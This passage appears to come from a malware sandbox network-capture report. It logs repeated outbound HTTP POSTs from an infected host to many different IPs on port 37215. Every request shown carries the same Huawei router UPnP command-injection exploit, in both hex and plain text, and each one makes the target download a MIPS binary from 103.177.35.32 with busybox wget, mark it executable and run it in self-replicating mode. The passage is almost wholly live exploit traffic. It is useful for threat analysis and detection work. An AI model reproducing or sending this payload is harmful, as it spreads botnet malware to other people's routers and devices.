                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2552192.168.2.2335866157.105.145.11537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591027975 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2553192.168.2.2336674197.221.94.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591031075 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2554192.168.2.2358382157.33.12.21037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591042995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2555192.168.2.234917641.44.126.15737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591042995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2556192.168.2.2357282194.80.199.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591042995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2557192.168.2.2345732216.255.170.12737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591073036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2558192.168.2.2341250197.166.213.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591073036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2559192.168.2.233330041.89.14.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591097116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2560192.168.2.2351784157.215.182.15037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591121912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2561192.168.2.2358114209.131.80.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.591145992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2562192.168.2.235539289.31.27.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.622206926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
